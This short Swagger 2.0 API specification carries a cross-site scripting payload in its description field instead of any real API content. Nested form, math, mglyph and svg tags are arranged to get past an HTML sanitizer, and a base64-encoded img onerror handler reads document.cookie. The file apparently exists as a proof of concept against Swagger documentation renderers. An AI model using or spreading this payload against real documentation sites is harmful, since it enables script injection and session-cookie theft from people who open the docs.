swagger: '2.0'
info:
  title: n
  description: |
  <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="PC90ZXh0YXJlYT48aW1nIG9uZXJyb3I9YWxlcnQoZG9jdW1lbnQuY29va2llKSBzcmM9MT4="></form>
  version: production
